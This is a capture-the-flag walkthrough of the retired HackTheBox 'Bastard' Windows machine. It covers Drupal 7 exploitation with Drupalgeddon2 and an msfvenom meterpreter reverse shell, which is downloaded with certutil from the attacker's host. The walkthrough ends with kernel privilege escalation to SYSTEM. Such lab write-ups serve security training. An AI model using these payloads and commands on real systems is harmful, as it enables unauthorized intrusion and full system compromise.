Bastard HackTheBox WalkThrough
This is Bastard HackTheBox machine walkthrough and it is also 6th machine of our
OSCP like HTB boxes
series. In this writeup, I have demonstrated step-by-step how I rooted to
Bastard HTB machine.
Before starting let us know something about this machine. It is a
Windows machine with IP address
10.10.10.9 and difficulty
medium assigned by its maker. This machine is currently
retired so you will require
VIP subscription at
hackthebox.eu to access this machine. Before starting, connect your PC with VPN and make sure your connectivity with Bastard machine by pinging the IP 10.10.10.9. If all goes correct then start hacking. As usual I started by scanning the machine. I used
Nmap [a popular port scanner] for this task and the result is below-
$ nmap -sC -sV -oN bastard.nmap 10.10.10.9
Nmap revealed that port 80, 135 and 49154 are open.
Microsoft IIS 7 web server on port
Microsoft RPC service on port
49154 are running. Nmap script
http-generator revealed that the website is made up of
Drupal CMS [Drupal is a Content Management System as we have WordPress] and its version is
7. Soon I get any software and its version then immediately I search for public exploit using
searchsploit. Searchsploit listed many number of potential exploits. However, the problem is that, there are many numbers of exploits and we do not know which exploit will surely work. For filtering the most appropriate one, I had to know the exact version of the
Drupal, which is running on port 80. After some googling, found this answer from stackoverflow.
Ongoing to http://10.10.10.9/CHANGELOG.txt URL found that the installed version is
Then again queried through
searchsploit and this time it found
8 potential exploits.
$ searchsploit drupal 7.54
After trying each of them, I found only
44449.rb worked for me. For more info about this exploit, you can check here. Then,
mirrored the exploit to my current directory using
-m switch of searchsploit.
$ searchsploit -m php/webapps/44449.rb
44449.rb is in
DOS form so converted it into
UNIX format using the command
$ dos2unix 44449.rb
Ran this exploit to get user shell.
Getting User Shell
$ ruby 44449.rb
drupalgeddon2 >> whoami
Note: If you get error as shown in the screenshot. This error is due to a missing a gem named highline, in your gem directory. Therefore, to solve this problem you have to install this gem using the command $sudo gem install highline
We got a
user shell by the user named
iusr. Right now, we are in a fake cmd shell, which has limited functionality, and we cannot capture user flag because this shell restricts the execution of
type command. So, I upgraded the shell to meterpreter shell by dropping a payload created through
msfvenom, into bastard machine and then getting
shell back on my listener in
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4321 -f exe>shell.exe # This will create an exe payload on our local PC
$ python3 -m http.server 80 //Start python http server to host this shell.exe file
drupalgeddon2>>certutil.exe -urlcache -split -f "http://10.10.14.8/shell.exe" shell.exe # This will download the payload to bastard machine.
Started the listener on msfconsole to get the reverse shell back
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.8
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > exploit
meterpreter > sysinfo
We have successfully upgraded our shell to meterpreter shell. Now we have many options to play with our meterpreter shell.
Capture User Flag
meterpreter > cat 'C:\Users\dimitris\Desktop\user.txt'
To escalate the privilege to admin we have to first find a
privilege escalation vector. Then using that PrivEsc vector we will exploit, to get admin privilege shell. To find PrivEsc vector I ran the post exploitation module
post/multi/recon/local_exploit_suggester, which gathers all the exploit modules that can be used to escalate privilege. Basically, it will enumerate all the potential
Kernel Exploits whose patch is not installed in the Bastard Machine.
Finding PrivEsc Vector
meterpreter > run post/multi/recon/local_exploit_suggester
Local Exploit Suggester gave 5 exploits that can be used to get admin shell. I tried each of them one by one and only
exploit/windows/local/ms16_014_wmi_recv_notif module worked. So here,
PrivEsc vector is a
Getting Root Shell
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> set SESSION 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> set LHOST 10.10.14.8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> exploit
meterpreter > getuid
NT AUTHORITY\SYSTEM. Let us capture root flag.
Capture Root Flag
meterpreter > cat /Users/Administrator/Desktop/root.txt.txt
This was how I rooted Bastard HackTheBox machine. Learnt a lot after hunting this box. Hope you people have also learnt some new things from this box. Thanks for reading this writeup. Write your experience in the comment section. For any suggestion and query related to walkthrough feel free to write us at [email protected].
Next machine walkthrough is Arctic.